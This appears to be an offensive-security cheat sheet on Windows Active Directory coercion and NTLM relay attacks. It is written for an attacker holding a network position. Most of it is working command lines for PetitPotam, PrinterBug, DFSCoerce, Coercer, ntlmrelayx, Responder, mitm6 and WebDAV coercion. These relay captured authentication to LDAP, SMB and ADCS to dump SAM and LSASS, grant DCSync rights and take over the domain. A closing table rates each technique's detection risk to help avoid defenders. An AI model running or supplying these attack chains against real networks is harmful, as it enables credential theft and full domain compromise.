Coercion and Relay Attacks
Force authentication from machines and relay captured credentials. PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, coercion to NTLM relay chains targeting LDAP, SMB, HTTP, and ADCS. Responder, ntlmrelayx, mitm6, and WPAD poisoning.
Sections Coercion and Relay Attacks
You have a network position between targets and want to force machines to authenticate to you, then relay that authentication to a service that accepts NTLM. Coercion triggers the authentication, relay redirects it. Together they chain into privilege escalation without cracking a single hash.
Coercion and Relay Overview
| Coercion Method | Protocol | Requires Auth | Target |
|---|---|---|---|
| PetitPotam | MS-EFSRPC | No (unpatched) / Yes (patched) | Any machine with EFS |
| PrinterBug (SpoolSample) | MS-RPRN | Yes | Any machine with Print Spooler |
| DFSCoerce | MS-DFSNM | Yes | Any machine with DFS |
| ShadowCoerce | MS-FSRVP | Yes | Machines with File Server VSS Agent |
| WebDAV + SearchConnector | HTTP | Yes | Machines with WebClient service |
| Relay Target | Port | What You Get | Requirement |
|---|---|---|---|
| LDAP/LDAPS | 389/636 | Modify AD objects (RBCD, Shadow Creds, DCSync ACL) | LDAP signing not enforced |
| SMB | 445 | Command execution, share access | SMB signing not required |
| HTTP (ADCS) | 80/443 | Request certificates as the relayed user | Web enrollment enabled |
| MSSQL | 1433 | SQL execution as relayed user | NTLM auth accepted |
Pre-Attack Checks
Before running any relay attack, verify that signing is not enforced on the target protocol.
LDAP Signing Check
terminal
# NetExec module
root@localhost:~# netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M ldap-checker
# LdapRelayScan
root@localhost:~# python3 LdapRelayScan.py -method BOTH -dc-ip 10.10.11.35 -u svc_backup -p 'P@ssw0rd123'SMB Signing Check
terminal
# NetExec - generate relay target list (hosts without signing required)
root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123' --gen-relay-list relay_targets.txt
# Nmap
root@localhost:~# nmap -p 445 --script smb2-security-mode 10.10.11.0/24WebDAV Check
terminal
# Check which hosts have the WebClient service running
root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123' -M webdavDCs have SMB signing required by default. Member servers and workstations have it enabled but not required by default. LDAP signing is not required by default on any Windows version. Always verify, because hardened environments may differ.
Coercion Methods
PetitPotam (MS-EFSRPC)
Abuses the Encrypting File System Remote Protocol to force a target to authenticate to your listener.
terminal
# Unauthenticated (pre-patch, CVE-2021-36942)
root@localhost:~# python3 PetitPotam.py 10.10.14.5 10.10.11.35
# Authenticated (works on patched systems)
root@localhost:~# python3 PetitPotam.py -u svc_backup -p 'P@ssw0rd123' -d corp.local 10.10.14.5 10.10.11.35
# Target a specific pipe
root@localhost:~# python3 PetitPotam.py -u svc_backup -p 'P@ssw0rd123' -d corp.local -pipe efsr 10.10.14.5 10.10.11.35PrinterBug (MS-RPRN / SpoolSample)
Forces any machine with the Print Spooler service running to authenticate to you.
terminal
# Python version
root@localhost:~# python3 printerbug.py corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35 10.10.14.5
# Dementor (alternative)
root@localhost:~# python3 dementor.py -d corp.local -u svc_backup -p 'P@ssw0rd123' 10.10.14.5 10.10.11.35powershell
PS C:\> .\SpoolSample.exe dc01.corp.local 10.10.14.5DFSCoerce (MS-DFSNM)
terminal
root@localhost:~# python3 DFSCoerce.py -u svc_backup -p 'P@ssw0rd123' -d corp.local 10.10.14.5 10.10.11.35ShadowCoerce (MS-FSRVP)
terminal
root@localhost:~# python3 ShadowCoerce.py -u svc_backup -p 'P@ssw0rd123' -d corp.local 10.10.14.5 10.10.11.35Coercer (Multi-Method)
Wraps all known coercion methods into a single tool.
terminal
# Test all coercion methods
root@localhost:~# coercer coerce -u svc_backup -p 'P@ssw0rd123' -d corp.local -l 10.10.14.5 -t 10.10.11.35
# Scan for vulnerable endpoints first
root@localhost:~# coercer scan -u svc_backup -p 'P@ssw0rd123' -d corp.local -t 10.10.11.35
# Use a specific method
root@localhost:~# coercer coerce -u svc_backup -p 'P@ssw0rd123' -d corp.local -l 10.10.14.5 -t 10.10.11.35 --filter-method-name EfsRpcOpenFileRawUse
coercer scan first to identify which methods work on the target. Then use coercer coerce --filter-method-name with the specific method. This avoids unnecessary noise from failed attempts.NTLM Relay with ntlmrelayx
Relay to LDAP (Set RBCD)
terminal
# Start ntlmrelayx targeting the DC's LDAP
root@localhost:~# impacket-ntlmrelayx -t ldap://10.10.11.35 --delegate-access
# In another terminal, coerce the target
root@localhost:~# python3 PetitPotam.py -u svc_backup -p 'P@ssw0rd123' -d corp.local 10.10.14.5 10.10.11.40
# ntlmrelayx creates a computer account and sets RBCD automatically
# Complete the attack with S4U
root@localhost:~# impacket-getST corp.local/'YOURPC$':'<password_from_output>' -spn cifs/ws01.corp.local -impersonate Administrator -dc-ip 10.10.11.35
root@localhost:~# export KRB5CCNAME=Administrator@cifs_ws01.corp.local@CORP.LOCAL.ccache
root@localhost:~# impacket-psexec corp.local/Administrator@ws01.corp.local -k -no-passRelay to LDAP (Shadow Credentials)
terminal
root@localhost:~# impacket-ntlmrelayx -t ldap://10.10.11.35 --shadow-credentials --shadow-target 'ws01$'
# After relay, use the generated certificate for PKINIT
root@localhost:~# python3 gettgtpkinit.py corp.local/'ws01$' ws01.ccache -cert-pfx ws01.pfx -pfx-pass <password>
root@localhost:~# export KRB5CCNAME=ws01.ccache
root@localhost:~# python3 getnthash.py -key <AS-REP-key> corp.local/'ws01$'Relay to LDAP (Grant DCSync Rights)
terminal
root@localhost:~# impacket-ntlmrelayx -t ldap://10.10.11.35 --escalate-user svc_backup
# After relay, DCSync
root@localhost:~# impacket-secretsdump corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35 -just-dcRelay to SMB
terminal
# Relay for command execution
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support -c "whoami > C:\Temp\relay_output.txt"
# Relay for interactive SMB shell
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support -i
# Connect: nc 127.0.0.1 11000
# Dump SAM from relayed targets
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support --dump-sam
# Dump LSASS
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support --dump-lsassRelay to ADCS (ESC8)
terminal
# Relay to ADCS HTTP endpoint to request a certificate
root@localhost:~# impacket-ntlmrelayx -t http://ca01.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# After relay, authenticate with the captured certificate
root@localhost:~# certipy auth -pfx dc01.pfx -dc-ip 10.10.11.35
# Or use PKINITtools
root@localhost:~# python3 gettgtpkinit.py corp.local/'DC01$' dc01.ccache -cert-pfx dc01.pfx
root@localhost:~# export KRB5CCNAME=dc01.ccache
root@localhost:~# impacket-secretsdump corp.local/'DC01$'@dc01.corp.local -k -no-pass -just-dcCoercing a DC and relaying to ADCS web enrollment (ESC8) is a direct path from network position to full domain compromise. The DC’s machine account certificate has DCSync rights by default.
Responder (LLMNR/NBT-NS/mDNS Poisoning)
Responder poisons name resolution protocols to capture NTLM hashes from machines on the local network.
terminal
# Start Responder
root@localhost:~# sudo responder -I eth0 -wFb
# Analysis mode (passive, just listen)
root@localhost:~# sudo responder -I eth0 -A
# Hashes are saved to /usr/share/responder/logs/Crack NTLMv2 Hashes
terminal
# Hashcat mode 5600
root@localhost:~# hashcat -m 5600 responder_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# John
root@localhost:~# john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt responder_hashes.txtResponder + ntlmrelayx Combo
Run Responder for poisoning and ntlmrelayx for relay simultaneously.
terminal
# Edit /etc/responder/Responder.conf
# Set SMB = Off and HTTP = Off (avoid port conflicts)
# Terminal 1: Responder
root@localhost:~# sudo responder -I eth0 -wFb
# Terminal 2: ntlmrelayx
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support --dump-sammitm6 (IPv6 DNS Takeover)
Abuses the default Windows preference for IPv6 over IPv4. Responds to DHCPv6 requests and becomes the DNS server, allowing DNS redirection and NTLM capture.
terminal
# Terminal 1: Start mitm6
root@localhost:~# sudo mitm6 -d corp.local -i eth0
# Terminal 2: ntlmrelayx for LDAP relay
root@localhost:~# impacket-ntlmrelayx -6 -t ldaps://10.10.11.35 --delegate-access -wh wpad.corp.localmitm6 is effective in environments where IPv6 is not actively used but not disabled (most environments). The attack triggers when machines perform DHCPv6 discovery, which happens periodically and at boot.
WebDAV-Based Coercion
WebDAV sends authentication over HTTP instead of SMB, bypassing SMB signing requirements.
terminal
# Check for WebClient service
root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123' -M webdav
# Coerce via PetitPotam using WebDAV (HTTP-based)
# The @ syntax forces WebDAV instead of SMB
root@localhost:~# python3 PetitPotam.py -u svc_backup -p 'P@ssw0rd123' -d corp.local "10.10.14.5@80/test" 10.10.11.40
# Start WebClient service remotely (if installed but not running)
root@localhost:~# netexec smb 10.10.11.40 -u svc_backup -p 'P@ssw0rd123' -M webdav -o ACTION=startOPSEC Comparison
| Technique | Network Noise | Detection Risk | Notes |
|---|---|---|---|
| Responder poisoning | Medium | Medium | Generates LLMNR/NBT-NS responses |
| mitm6 | Low-Medium | Medium | IPv6 traffic often not monitored |
| PetitPotam (unauth) | Low | Low | Single RPC call |
| PrinterBug | Low | Low | Normal print spooler RPC |
| NTLM relay to LDAP | Low | Medium | LDAP modification events (5136) |
| NTLM relay to SMB | Medium | High | Service creation, file writes |
| NTLM relay to ADCS | Low | Low | Normal certificate request |